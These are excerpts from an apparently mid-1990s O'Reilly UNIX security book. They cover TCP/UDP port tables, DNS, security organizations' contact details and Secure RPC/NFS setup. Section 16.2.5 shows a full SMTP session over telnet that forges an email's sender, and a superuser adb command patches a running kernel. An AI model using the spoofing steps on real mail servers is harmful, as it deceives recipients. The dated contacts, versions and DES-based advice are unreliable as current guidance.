TCP Port Service Name Function<br />

7 echo Echoes characters (for testing)<br />

9 discard Discards characters (for testing)<br />

13 daytime Time of day<br />

19 chargen Character generator<br />

21 ftp File Transfer Protocol (FTP)<br />

23 telnet Virtual terminal<br />

25 smtp Electronic mail<br />

37 time Time of day<br />

42 nameserver TCP nameservice<br />

43 whois NIC whois service<br />

53 domain Domain Name Service (DNS)<br />

79 finger User information<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_02.htm (10 of 15) [2002-04-12 10:44:38]


[Chapter 16] 16.2 IPv4: The <strong>Internet</strong> Protocol Version 4<br />

80 http World Wide Web (WWW)<br />

109 pop2 Post Office Protocol (POP)<br />

110 pop3 Post Office Protocol (POP)<br />

111 sunrpc Sun Microsystem's Remote Procedure Call (RPC)<br />

113 auth Authentication Service<br />

119 nntp Network News Transfer Protocol (NNTP) (Usenet)<br />

178 nsws NeXTSTEP Window Server<br />

512 exec Executes commands on a remote <strong>UNIX</strong> host<br />

513 login Logs in to a remote <strong>UNIX</strong> host<br />

514 shell Retrieves a shell on a remote <strong>UNIX</strong> host<br />

515 printer Remote printing<br />

540 uucp Runs UUCP over TCP/IP (primarily used for transporting netnews)<br />

2049 NFS NFS over TCP<br />

6000+ X X Window System<br />

16.2.4.3 UDP<br />

The User Datagram Protocol provides a simple, unreliable system for sending packets of data between two or more<br />

programs running on the same or different computers. "Unreliable" means that the operating system does not<br />

guarantee that every packet sent will be delivered, or that packets will be delivered in order. UDP does make its best<br />

effort to deliver the packets, however. On a LAN, UDP often approaches 100% reliability.<br />

UDP's advantage is that it has less overhead than TCP - less overhead lets UDP-based services transmit information<br />

with as much as 10 times the throughput. UDP is used primarily for Sun's Network Filesystem, for NIS, for resolving<br />

hostnames, and for transmitting routing information. It is also used for services that aren't affected negatively if they<br />

miss an occasional packet because they will get another periodic update later, or because the information isn't really<br />

that important. This includes services such as rwho, talk, and some time services.<br />

UDP packets are often broadcast to a given port on every host that resides on the same local area network. Broadcast<br />

packets are used frequently for services such as time of day.<br />

As with TCP, UDP packets are also sent from a porton the sending host to another port on the receiving host. Each<br />

UDP packet also contains user data. If a program is listening to the particular port and is ready for the packet, it will<br />

be received. Otherwise, the packet will be ignored.<br />

Ports are identified by 16-bit numbers. Table 0-71 lists some common UDP ports.<br />

Table 16.3: Some Common UDP Services and Ports<br />

UDP Port Service Name Function<br />

7 echo Returns the user's data in another datagram<br />

9 discard Does nothing<br />

13 daytime Returns time of day<br />

19 chargen Character Generator<br />

37 time Returns time of day<br />

53 domain Domain Name Service (DNS)<br />

69 tftp Trivial File Transfer Protocol (TFTP)<br />

111 sunrpc Sun Microsystem's Remote Procedure Call (RPC) portmapper<br />

123 ntp Network Time Protocol (NTP)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_02.htm (11 of 15) [2002-04-12 10:44:39]


[Chapter 16] 16.2 IPv4: The <strong>Internet</strong> Protocol Version 4<br />

161 snmp Simple Network Management Protocol (SNMP)<br />

512 biff Alerts you to incoming mail (Biff was the name of a dog who barked when the mailman<br />

came)<br />

513 who Returns who is logged into the system<br />

514 syslog System logging facility<br />

517 talk Initiates a talk request<br />

518 ntalk The "new" talk request<br />

520 route Routing Information Protocol (RIP)<br />

533 netwall Write on every user's terminal<br />

2049 NFS (usually) Network Filesystem (NFS)<br />

16.2.5 Clients and Servers<br />

The <strong>Internet</strong> Protocol is based on the client/server model. Programs called clients initiate connections over the<br />

network to other programs called servers, which wait for the connections to be made. One example of a client/server<br />

pair is the network time system. The client program is the program that asks the network server for the time. The<br />

server program is the program that listens for these requests and transmits the correct time. In <strong>UNIX</strong> parlance, server<br />

programs that run in the background and wait for user requests are often known as daemons.<br />

Clients and servers are normally different programs. For example, if you wish to log onto another machine, you can<br />

use the telnet program:<br />

% telnet athens.com<br />

Trying...<br />

Connected to ATHENS.COM<br />

Escape character is '^]'.<br />

4.4 BSD Unix (ATHENS.COM)<br />

login:<br />

When you type telnet, the client telnet program on your computer (usually the program /usr/bin/telnet, or possibly<br />

/usr/ucb/telnet) connects to the telnet server (in this case, named /usr/etc/in.telnetd) running on the computer<br />

athens.com. As stated, clients and servers normally reside in different programs. One exception to this rule is the<br />

sendmail program, which includes the code for both the server and a client, bundled together in a single application.<br />

The telnet program can also be used to connect to any other TCP port that has a process listening. For instance, you<br />

might connect to port 25 (the SMTP port) to fake some mail without going through the normal mailer:<br />

% telnet control.mil 25<br />

Trying 45.1.12.2 ...<br />

Connected to hq.control.mil.<br />

Escape character is '^]'.<br />

220-hq.control.mil Sendmail 8.6.10 ready at Tue, 17 Oct 1995 20:00:09 -0500<br />

220 ESMTP spoken here<br />

HELO kaos.org<br />

250 hq.control.mil Hello kaos.org, pleased to meet you<br />

MAIL FROM:<br />

250 ... Sender ok<br />

RCPT TO:<br />

550 ... Recipient ok<br />

DATA<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_02.htm (12 of 15) [2002-04-12 10:44:39]


[Chapter 16] 16.2 IPv4: The <strong>Internet</strong> Protocol Version 4<br />

354 Enter mail, end with "." on a line by itself<br />

To: agent99<br />

From: Max <br />

Subject: tonight<br />

99,<br />

I know I was supposed to take you out to dinner tonight, but I have<br />

been captured by KAOS agents, and they won't let me out until they<br />

finish torturing me. I hope you understand.<br />

Love, Max<br />

.<br />

250 UAA01441 Message accepted for delivery<br />

quit<br />

221 hq.control.mil closing connection<br />

Connection closed by foreign host.<br />

%<br />

16.2.6 Name Service<br />

As we mentioned, in the early days of the <strong>Internet</strong>, a single /etc/hosts file contained the address and name of each<br />

computer on the <strong>Internet</strong>. But as the file grew to contain thousands of lines, and as changes to the list of names (or the<br />

namespace) started being made on a daily basis, a single /etc/hosts file soon became impossible to maintain. Instead,<br />

the <strong>Internet</strong> developed a distributed networked-based naming service called the Domain Name Service (DNS).<br />

DNS implements a large-scale distributed database for translating hostnames into IP addresses and vice-versa, and<br />

performing related name functions. The software performs this function by using the network to resolve each part of<br />

the hostname distinctly. For example, if a computer is trying to resolve the name girigiri.gbrmpa.gov.au, it would first<br />

get the address of the root domain server (usually stored in a file) and ask that machine for the address of the au<br />

domain server. The computer would then ask the au domain server for the address of the gov.au domain server, and<br />

then would ask that machine for the address of the gbrmpa.gov.au domain server. Finally, the computer would then<br />

ask the gbrmpa.gov.au domain server the address for the computer called girigiri.gbrmpa.gov.au. (Name resolution is<br />

shown in Figure 16.7.) A variety of caching techniques are employed to minimize overall network traffic.<br />

Figure 16.7: The DNS tree hierarchy for name resolution<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_02.htm (13 of 15) [2002-04-12 10:44:39]


[Chapter 16] 16.2 IPv4: The <strong>Internet</strong> Protocol Version 4<br />

DNS is based on UDP, but can also use a TCP connection for some operations.<br />

16.2.6.1 DNS under <strong>UNIX</strong><br />

The standard <strong>UNIX</strong> implementation of DNS is called bind and was originally written at the University of California at<br />

Berkeley. This implementation is based on three parts: a library for the client side, and two programs for the server:<br />

Resolver<br />

The resolver library uses DNS to implement the gethostbyname() and gethost-byaddress() library calls. It is<br />

linked into any program that needs to perform name resolution using DNS. The first time that a program linked<br />

with the resolver attempts to resolve a hostname, the library reads the /etc/resolv.conf file to determine the IP<br />

address of the nameserver to be used for name resolution. The resolv.conf file can also contain the program's<br />

default domain, which is used to resolve unqualified hostnames (such as girigiri, as opposed to<br />

girigiri.gbrmpa.gov.au).<br />

named (or in.named)<br />

The named daemon is the program which implements the server side of the DNS system. When named is<br />

started, it reads a boot file (usually /etc/named.boot) that directs the program to the location of its auxiliary files.<br />

These files then initialize the named daemon with the location of the root domain servers. If the named daemon<br />

is the nameserver for a domain or a subdomain (which is usually the case), the configuration file instructs the<br />

program to read in the domain's host tables or get them from a "master" server.<br />

named-xfer<br />

Program used to transfer zones from primary to secondary servers. This program is usually installed as<br />

/etc/named-xfer. It is run by the secondary server to perform a zone transfer. The named-xfer program connects<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_02.htm (14 of 15) [2002-04-12 10:44:39]


[Chapter 16] 16.2 IPv4: The <strong>Internet</strong> Protocol Version 4<br />

to the named program running on the primary server and performs the transfer using TCP.<br />

More details about DNS and the BIND name server may be found in the <strong>O'Reilly</strong> & Associates book DNS and BIND<br />

by Paul Albitz and Cricket Liu.<br />

16.2.6.2 Other naming services<br />

In addition to DNS, there are at least four vendor-specific systems for providing nameservice and other information to<br />

networked workstations. They are:<br />

NIS (Sun Microsystems)<br />

Originally called "Yellow Pages," Sun's Network Information System (NIS) creates a simple mechanism<br />

whereby files such as /etc/passwd and /etc/hosts from one computer can be shared by another. Although NIS<br />

has numerous security problems, it is widely used. [11]<br />

[11] We describe NIS and NIS+ in more detail in Chapter 19, RPC, NIS, NIS+, and Kerberos.<br />

NIS+ (Sun Microsystems)<br />

NIS+ is a total rewrite of NIS, and it dramatically increases both security and flexibility. Nevertheless, NIS+ is<br />

not used as widely as NIS.<br />

NetInfo (NeXT, Inc.)<br />

NetInfo is a distributed database similar to NIS+. NetInfo is tightly integrated in NeXT's NEXTSTEP operating<br />

system and is available for other operating systems from a third party.<br />

DCE (Open Software Foundation)<br />

OSF's Distributed Computing Environment offers yet another system for distributing a database of information,<br />

such as usernames and hosts addresses, to networked workstations.<br />

All of these systems are designed to distribute a variety of administrative information throughout a network. All of<br />

these systems must also use DNS to resolve hostnames outside the local organization.<br />

16.1 Networking 16.3 IP <strong>Sec</strong>urity<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_02.htm (15 of 15) [2002-04-12 10:44:39]


[Appendix F] Organizations<br />

F. Organizations<br />

Contents:<br />

Professional Organizations<br />

U. S. Government Organizations<br />

Emergency Response Organizations<br />

Appendix F<br />

Here we have collected information on a number of useful organizations you can contact for more<br />

information and additional assistance.<br />

F.1 Professional Organizations<br />

You may find the following organizations helpful. The first few provide newsletters, training, and<br />

conferences. FIRST organizations may be able to provide assistance in an emergency.<br />

F.1.1 Association for Computing Machinery (ACM)<br />

The Association for Computing Machinery is the oldest of the computer science professional<br />

organizations. It publishes many scholarly journals and annually sponsors dozens of research and<br />

community-oriented conferences and workshops. The ACM also is involved with issues of education,<br />

professional development, and scientific progress. It has a number of special interest groups (SIGS) that<br />

are concerned with security and computer use. These include the SIGS on <strong>Sec</strong>urity, Audit and Control;<br />

the SIG on Operating Systems; the SIG on Computers and Society; and the SIG on Software<br />

Engineering.<br />

The ACM may be contacted at:<br />

ACM Headquarters<br />

11 West 42 Street<br />

New York, NY 10036 &<br />

plus;1-212-869-7440<br />

The ACM has an extensive set of electronic resources, including information on its conferences and<br />

special interest groups. The information provided through the World Wide Web page is especially<br />

comprehensive and well organized:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_01.htm (1 of 5) [2002-04-12 10:44:39]


[Appendix F] Organizations<br />

http://www.acm.org<br />

F.1.2 American Society for Industrial <strong>Sec</strong>urity (ASIS)<br />

The American Society for Industrial <strong>Sec</strong>urity is a professional organization for those working in the<br />

security field. ASIS has been in existence for 35 years and has 22,000 members in 175 local chapters,<br />

worldwide. Its 25 standing committees focus on particular areas of security, including computer security.<br />

The group publishes a monthly magazine devoted to security and loss management. ASIS also sponsors<br />

meetings and other group activities. Membership is open only to individuals involved with security at a<br />

management level.<br />

More information may be obtained from:<br />

American Society for Industrial <strong>Sec</strong>urity<br />

1655 North Fort Meyer Drive Suite 1200<br />

Arlington, VA 22209<br />

+1-703-522-5800<br />

F.1.3 Computer <strong>Sec</strong>urity Institute (CSI)<br />

The Computer <strong>Sec</strong>urity Institute was established in 1974 as a multiservice organization dedicated to<br />

helping its members safeguard their electronic data processing resources. CSI sponsors workshops and<br />

conferences on security, publishes a research journal and a newsletter devoted to computer security, and<br />

serves as a clearinghouse for security information. The Institute offers many other services to members<br />

and the community on a for-profit basis. Of particular use is an annual Computer <strong>Sec</strong>urity Buyer's Guide<br />

that lists sources of software, literature, and security consulting.<br />

You may contact CSI at:<br />

Computer <strong>Sec</strong>urity Institute<br />

600 Harrison Street<br />

San Francisco, CA 94107<br />

+1-415-905-2626<br />

F.1.4 High Technology Crimes Investigation Association (HTCIA)<br />

The HTCIA is a professional organization for individuals involved with the investigation and prosecution<br />

of high-technology crime, including computer crime. There are chapters throughout the U.S., and some<br />

are forming in other countries. Information is available via the WWW page:<br />

http://htcia.org<br />

John Smith, of the Northern California chapter, will provide contact information to interested parties who<br />

do not have WWW access:<br />

Voice: +1-408-299-7401<br />

Email: jsmith@netcom.com<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_01.htm (2 of 5) [2002-04-12 10:44:39]


[Appendix F] Organizations<br />

F.1.5 Information Systems <strong>Sec</strong>urity Association (ISSA)<br />

The ISSA is an international organization of information security professionals and practitioners. It<br />

provides education forums, publications, and peer interaction opportunities that enhance the knowledge,<br />

skill, and professional growth of its members.<br />

For more information about ISSA, contact:<br />

ISSA Headquarters<br />

4350 DiPaolo Center Suite C<br />

Glenview, IL 60025-5212<br />

+1-708-699-6441 +1-708-699-6369<br />

ISSA has a WWW page at:<br />

http://www.uhsa.uh.edu/issa<br />

F.1.6 The <strong>Internet</strong> Society<br />

The <strong>Internet</strong> Society sponsors many activities and events related to the <strong>Internet</strong>, including an annual<br />

symposium on network security. For more information, contact the <strong>Internet</strong> Society:<br />

http://www.isoc.org<br />

You may also contact:<br />

+1 703/648- 9888<br />

Email: membership@isoc.org<br />

F.1.7 IEEE Computer Society<br />

With more than 100,000 members, the Computer Society is the largest member society of the Institute of<br />

Electrical and Electronics Engineers (IEEE). It too is involved with scholarly publications, conferences<br />

and workshops, professional education, technical standards, and other activities designed to promote the<br />

theory and practice of computer science and engineering. The IEEE-CS also has special interest groups,<br />

including a Technical Committee on <strong>Sec</strong>urity and Privacy, a Technical Committee on Operating<br />

Systems, and a Technical Committee on Software Engineering. More information on the Computer<br />

Society may be obtained from:<br />

IEEE Computer Society<br />

1730 Massachusetts Avenue N.W.<br />

Washington, DC 20036-1903<br />

(800) 678-4333<br />

The Computer Society has a set of WWW pages starting at:<br />

http://www.computer.org<br />

The Computer Society's Technical Committee on <strong>Sec</strong>urity and Privacy has a number of resources,<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_01.htm (3 of 5) [2002-04-12 10:44:39]


[Appendix F] Organizations<br />

including an online newsletter:<br />

http://www.itd.nrl.navy.mil/ITD/5540/ieee<br />

F.1.8 IFIP Technical Committee 11<br />

The International Federation for Information Processing, Technical Committee 11, is devoted to<br />

research, education, and communication about information systems security. The working groups of the<br />

committee sponsor various activities, including conferences, throughout the world. More information<br />

may be obtained from:<br />

http://www.iaik.tu-graz.ac.at/tc11_hom.html<br />

F.1.9 National Computer <strong>Sec</strong>urity Association (NCSA)<br />

The National Computer <strong>Sec</strong>urity Association is a commercial organization devoted to computer security.<br />

They sponsor tutorials, exhibitions, and other activities with a particular emphasis on PC users. NCSA<br />

may be contacted at:<br />

National Computer <strong>Sec</strong>urity Association<br />

10 South Courthouse Avenue<br />

Carlisle, PA 17013<br />

+1-717-258-1816<br />

office@ncsa.com<br />

The NCSA has a WWW page at:<br />

http://www.ncsa.com<br />

F.1.10 USENIX/SAGE<br />

The USENIX Association is a nonprofit education organization for users of <strong>UNIX</strong> and <strong>UNIX</strong>-like<br />

systems. The Association publishes a refereed journal (Computing Systems) and newsletter, sponsors<br />

numerous conferences, and has representatives on international standards bodies. The Association<br />

sponsors an annual workshop on <strong>UNIX</strong> security and another on systems administration.<br />

SAGE stands for the Systems Administrators Guild. It is a special technical group of the USENIX<br />

Association. To join SAGE, you must also be a member of USENIX.<br />

Information on USENIX and SAGE can be obtained from:<br />

USENIX Association<br />

2560 Ninth Street Suite 215<br />

Berkeley, CA 94703<br />

+1-510- 528-8649<br />

office@usenix.org<br />

The USENIX WWW page is at:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_01.htm (4 of 5) [2002-04-12 10:44:39]


[Appendix F] Organizations<br />

http://www.usenix.org<br />

E.4 Software Resources F.2 U. S. Government<br />

Organizations<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_01.htm (5 of 5) [2002-04-12 10:44:39]


[Chapter 19] 19.3 <strong>Sec</strong>ure RPC (AUTH_DES)<br />

Chapter 19<br />

RPC, NIS, NIS+, and Kerberos<br />

19.3 <strong>Sec</strong>ure RPC (AUTH_DES)<br />

In the late 1980s, Sun Microsystems developed a system for improving <strong>UNIX</strong> network security. Called <strong>Sec</strong>ure RPC, Sun's system<br />

was first released with the SunOS 4.0 operating system. Although early versions of <strong>Sec</strong>ure RPC were difficult to use, later releases of<br />

the Solaris operating system have integrated <strong>Sec</strong>ure RPC into Sun's NIS+ network information system (described later in this<br />

chapter), which makes administration very simple.<br />

<strong>Sec</strong>ure RPC is based on a combination of public key cryptography and secret key cryptography, which we describe in Chapter 6,<br />

Cryptography. Sun's implementation uses the Diffie-Hellman mechanism for key exchange between users, and DES secret key<br />

cryptography for encrypting information that is sent over the network. DES is also used to encrypt the user's secret key that is stored<br />

in a central network server. This encryption eliminates the need for users to memorize or carry around the hundred-digit numbers that<br />

make up their secret keys.<br />

<strong>Sec</strong>ure RPC solves many of the problems of AUTH_<strong>UNIX</strong> style authentication. Because both users and computers must be<br />

authenticated, it eliminates many of the spoofing problems to which other systems lend themselves. Indeed, when used with<br />

higher-level protocols, such as NFS, <strong>Sec</strong>ure RPC can bring unprecedented security to the networked environment. Nevertheless,<br />

<strong>Sec</strong>ure RPC, has not enjoyed the widespread adoption that Sun's original RPC did. There are probably several reasons:<br />

●<br />

●<br />

The University of California at Berkeley did not write a free implementation of <strong>Sec</strong>ure RPC.[5] As a result, the only way for<br />

vendors to implement <strong>Sec</strong>ure RPC was to write their own version (an expensive proposition) or to license the code from Sun.<br />

[5] Because <strong>Sec</strong>ure RPC is based on public key cryptography, using it within the United States would have<br />

required a license from the holder of the particular patents in question. At the time that Berkeley was developing<br />

its free version of the <strong>UNIX</strong> operating system, the holder of the public key cryptography patents, a California<br />

partnership called Public Key Partners, was notoriously hesitant to give licenses to people who were writing free<br />

versions of programs implementing the PKP algorithms. This situation might change after 1997, when the patents<br />

covering Diffie-Hellman cryptography expire.<br />

For whatever reason, many <strong>UNIX</strong> vendors were unwilling or unable to license or implement <strong>Sec</strong>ure RPC from Sun. Thus, it is<br />

not possible to interoperate with those systems.<br />

19.3.1 <strong>Sec</strong>ure RPC Authentication<br />

<strong>Sec</strong>ure RPC authentication is based on the Diffie-Hellman exponential key exchange system. Each <strong>Sec</strong>ure RPC principal[6] has a<br />

secret key and a public key, both of which are stored on the <strong>Sec</strong>ure RPC server. The public key is stored unencrypted; the secret key<br />

is stored encrypted with the principal's password. Both keys are typically hexadecimal numbers of several hundred digits.<br />

[6] <strong>Sec</strong>ure RPC principals are users that have <strong>Sec</strong>ure RPC passwords and computers that are configured to use <strong>Sec</strong>ure<br />

RPC.<br />

A <strong>Sec</strong>ure RPC principal proves his, her or its identity by being able to decrypt the stored secret key and participating in the<br />

Diffie-Hellman key exchange. Each principal combines its secret key with the other's public key, allowing both to arrive<br />

independently at a common mutually known key. This key is then used to exchange a session key.<br />

19.3.1.1 Proving your identity<br />

The way you prove your identity with a public key system is by knowing your secret key. Unfortunately, most people aren't good at<br />

remembering hundred-digit numbers, and deriving a good pair of numbers for a {public key, secret key} pair from a <strong>UNIX</strong> password<br />

is relatively difficult.<br />

Sun solves these problems by distributing a database consisting of usernames, public keys, and encrypted secret keys using the Sun<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_03.htm (1 of 6) [2002-04-12 10:44:40]


[Chapter 19] 19.3 <strong>Sec</strong>ure RPC (AUTH_DES)<br />

NIS or NIS+ network database system. (Both NIS and NIS+ are described later in this chapter.) The secret key is encrypted using the<br />

user's <strong>UNIX</strong> password as the key and the DES encryption algorithm. If you know your <strong>UNIX</strong> password, your workstation software<br />

can get your secret key and decrypt it.<br />

For each user, the following information is maintained:[7]<br />

[7] The information could be maintained in the files /etc/publickey and /etc/netid. If you are using NIS, the data is stored<br />

in the NIS maps publickey.byname and netid.byname. With NIS+, all of this information is combined in a single NIS+<br />

table cred.org_dir.<br />

Netname or canonical name<br />

This is the user's definitive name over the network. An example is fred.sun.com, which signifies the user fred in the domain<br />

sun.com. Older versions of NIS used the form UID.<strong>UNIX</strong>@domain.<br />

User's public key<br />

A hexadecimal representation of the user's public key.<br />

User's secret key<br />

A hexadecimal representation of the user's secret key, encrypted using the user's password.<br />

The user's keys are created with either the chkey command or the nisaddcred command. Normally, this process is transparent to the<br />

user.<br />

When the user logs in to a computer running <strong>Sec</strong>ure RPC, the computer obtains a copy of the user's encrypted secret key. The<br />

computer then attempts to decrypt the secret key using the user's provided password. The secret key must now be stored for use in<br />

communication with the <strong>Sec</strong>ure RPC server. In Version 4.1 and above, the unencrypted key is kept in the memory of the keyserv key<br />

server process. (In the original version of <strong>Sec</strong>ure RPC, shipped with SunOS 4.0, the unencrypted secret key is then stored in the<br />

/etc/keystore file. This was less secure, as anyone gaining access to the user's workstation as either that user or as root would be able<br />

to easily access the user's secret key.)<br />

Next, the software on the workstation uses the user's secret key and the server's public key to generate a session key. (The server<br />

meanwhile has done the same thing using its secret key and the user's public key). The workstation then generates a random 56-bit<br />

conversation key and sends it to the server, encrypted with the session key. The conversation key is used for the duration of the login,<br />

and is stored in the key server process.<br />

The file server knows that the user is who he claims to be because:<br />

●<br />

●<br />

●<br />

●<br />

The packet that the user sent was encrypted using a conversation key.<br />

The only way that the user could know the conversation key would be by generating it, using the server's public key and the<br />

user's secret key.<br />

To know the user's secret key, the workstation had to look up the secret key using NIS and decrypt it.<br />

To decrypt the encrypted secret key, the user had to have known the key that it was encrypted with--which is, in fact, the user's<br />

password.<br />

Notice the following:<br />

●<br />

●<br />

●<br />

●<br />

The user's password is never transmitted over the network.<br />

The only time the secret key is transmitted over the network is when it is encrypted using the user's password.<br />

There is no "secret" information on the file server that must be protected from attackers.[8]<br />

[8] In contrast, the Kerberos system, as we shall see, requires that the master Kerberos Server be protected<br />

literally with lock and key; if the information stored on the Kerberos Server is stolen by an attacker, the entire<br />

system is compromised.<br />

The entire security of the system depends on the difficulty of breaking a 56-bit key.<br />

Because public key encryption is slow and difficult to use for large amounts of data, the only thing that it is used for is initially<br />

proving your identity and exchanging the session key. <strong>Sec</strong>ure RPC then uses the session key and DES encryption (described in<br />

Chapter 6) for all subsequent communications between the workstation and the server.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_03.htm (2 of 6) [2002-04-12 10:44:40]


[Chapter 19] 19.3 <strong>Sec</strong>ure RPC (AUTH_DES)<br />

19.3.1.2 Using <strong>Sec</strong>ure RPC services<br />

After your workstation and the server have agreed upon a session key, <strong>Sec</strong>ure RPC authenticates all RPC requests.<br />

When your workstation communicates with a server, the user provides a netname which the server is supposed to translate<br />

automatically into a local UID and GID. Ideally, this means that the user's UID on the server does not have to be the same as the<br />

user's UID on the workstation. In practice, most organizations insist that its users have a single UID through the organization, so the<br />

ability of <strong>Sec</strong>ure RPC to map UIDS from one computer to another is not terribly important.<br />

When your session key expires, your workstation and the server automatically renegotiate a new session key.<br />

19.3.1.3 Setting the window<br />

Inside the header sent with every <strong>Sec</strong>ure RPC request is a timestamp. This time-stamp prevents an attacker from capturing the<br />

packets from an active session and replaying them at a later time.<br />

For a timestamp-based system to operate properly, it's necessary for both the client and the server to agree on what time it is.<br />

Unfortunately, the real-time clocks on computers sometimes drift in relation to one another. This can present a serious problem to the<br />

user of <strong>Sec</strong>ure RPC: if the clock on the workstation and the clock on the file server drift too far apart, the server will not accept any<br />

more requests from the client! The client and server will then have to reauthenticate each other.<br />

Because reauthenticating takes time, <strong>Sec</strong>ure RPC allows the workstation system administrator to set the "window" that the server<br />

uses to determine how far the client's clock can drift and remain acceptable. Obviously, using a large window reduces the danger of<br />

drift. Unfortunately, large windows similarly increase the chance of a playback attack, in which an attacker sniffs a packet from the<br />

network, then uses the authenticated credentials for his or her own purposes. Larger windows increase the possibility of a playback<br />

attack because any packet that is intercepted will be good for a longer period of time.<br />

Solaris versions 2.3 and 2.4 use a default window of 60 minutes; Solaris version 2.5 uses a window of 300 seconds (5 minutes). This<br />

window is what Sun Microsystems recommends for security-sensitive applications.<br />

The size of the <strong>Sec</strong>ure RPC window is set in the kernel by the variable authdes_win, which stores the value of the window in<br />

seconds. On a System VR4 machine such as Solaris 2.x, you modify the authdes_win variable from the /etc/system file:<br />

set nfs:authdes_win=300<br />

You then reboot with the modified /etc/system file.<br />

If you have a SunOS system, you can modify the value of _authdes_win by using the adb debugger program. Execute the following<br />

commands as superuser:<br />

# adb -w /vmunix<br />

- authdes_win?D<br />

_authdes_win: _authdes_win: 3600<br />

The default window<br />

?W0t600<br />

_authdes_win: 0xe10 = 0x258 _authdes_win: 300<br />

$q<br />

Write the result out<br />

#<br />

You do not need to reboot under SunOS, as the adb command modifies both the kernel and the running image.<br />

Using a network time service like NTP (Network Time Protocol) can eliminate time skew between servers and workstations. Even<br />

without NTP, clocks typically don't skew more than five seconds during the course of a single day's operation. However, NTP servers<br />

can get skewed, and sometimes can even be maliciously led astray of the correct time. If you are depending on the correct time for a<br />

protocol, you might consider obtaining a clock that synchronizes with a radio time signal, so that you can set up your own time<br />

server.<br />

19.3.2 Setting Up <strong>Sec</strong>ure RPC with NIS<br />

To use <strong>Sec</strong>ure RPC, your client computers need a way of obtaining keys from the <strong>Sec</strong>ure RPC server. You can distribute the keys in<br />

standard <strong>UNIX</strong> files, or you can have them distributed automatically with either NIS or NIS+.[9]<br />

[9] If you are using <strong>Sec</strong>ure RPC on something other than a Sun system, be sure to check your documentation - there<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_03.htm (3 of 6) [2002-04-12 10:44:40]


[Chapter 19] 19.3 <strong>Sec</strong>ure RPC (AUTH_DES)<br />

may be some other way to distribute the key information.<br />

The easiest way to set up <strong>Sec</strong>ure RPC is to set up NIS+. Sun's NIS+ requires <strong>Sec</strong>ure RPC to function properly. As a result, the NIS+<br />

installation procedure will automatically create the appropriate <strong>Sec</strong>ure RPC keys and credentials. When you add new NIS+ users,<br />

their <strong>Sec</strong>ure RPC keys will automatically be created.<br />

Running <strong>Sec</strong>ure RPC with NIS is more difficult. You will need to manually create the keys and place them in the appropriate NIS<br />

maps. If you are not using NIS, you can simply place the keys in the file /etc/publickey. For detailed information, you should refer to<br />

your vendor documentation for explicit instructions on how to set up <strong>Sec</strong>ure RPC. Nevertheless, this guide may be helpful.<br />

19.3.2.1 Creating passwords for users<br />

Before you enable <strong>Sec</strong>ure RPC, make sure that every user has been assigned a public key and a secret key. Check the file<br />

/etc/publickey on the master NIS server. If a user doesn't have an entry in the database, you can create an entry for that user by<br />

becoming the superuser on the NIS master server and typing:<br />

# newkey -u username<br />

Alternatively, you create an entry in the database for the special user nobody. After an entry is created for nobody, users can run the<br />

chkey program on any client to create their own entries in the database.<br />

19.3.2.2 Creating passwords for hosts<br />

<strong>Sec</strong>ure RPC also allows you to create public key/secret key pairs for the superuser account on each host of your network. To do so,<br />

type:<br />

# newkey -h hostname<br />

19.3.2.3 Making sure <strong>Sec</strong>ure RPC programs are running on every workstation<br />

Log into a workstation and make sure that the keyserv and ypbind daemons are running. The programs should be started by a<br />

command in the appropriate system startup file (e.g., /etc/rc.local for BSD-derived systems, and /etc/rc2.d/s?rpc for System<br />

V-derived systems). You also need to make sure that the rpc.yp.updated is run from either inetd.conf or rc.local on the server.<br />

You can check for these daemons with the ps command (you would use the -ef flags to ps on a Solaris 2.X system):<br />

% ps aux | egrep 'keyserv|ypbind'<br />

root 63 0.0 0.0 56 32 ? IW Jul 30 0:30<br />

keyserv root 60 0.3 0.7 928 200 ? S Jul 30 3:10 ypbind<br />

You should log onto an NIS client and make sure that the publickey map is available. Use the ypcat publickey command. If the map<br />

is not available, log into the server and push it.<br />

NOTE: There is a very nasty vulnerability with rpc.ypupdated that allows external users access on servers or clients.<br />

See "CERT advisory CA-95:17. rpc.ypupdated.vul."<br />

19.3.2.4 Using <strong>Sec</strong>ure NFS<br />

Once you've gone to all of the trouble of setting up <strong>Sec</strong>ure RPC, your next step is to set up <strong>Sec</strong>ure NFS. We'll cover this in detail in<br />

Chapter 20. But if you want to go ahead and do it right now, here are the steps to follow for a BSD-derived system such as SunOS;<br />

the procedure is the same, but the filenames are different for other systems.<br />

On the file server, edit the /etc/exports file and add the -secure option for every filesystem that should be exported using <strong>Sec</strong>ure NFS.<br />

For example, suppose the old /etc/exports file exported the mail spool directory /usr/spool/mail with the line:<br />

/usr/spool/mail -access=allws<br />

To make the filesystem be exported using <strong>Sec</strong>ure NFS, change the line to read:<br />

/usr/spool/mail -secure,access=allws<br />

After changing /etc/exports, you need to do an exportfs (or equivalent).<br />

19.3.2.5 Mounting a secure filesystem<br />

You must modify the /etc/fstab file on every workstation that mounts a <strong>Sec</strong>ure NFS filesystem to include the secure option as a<br />

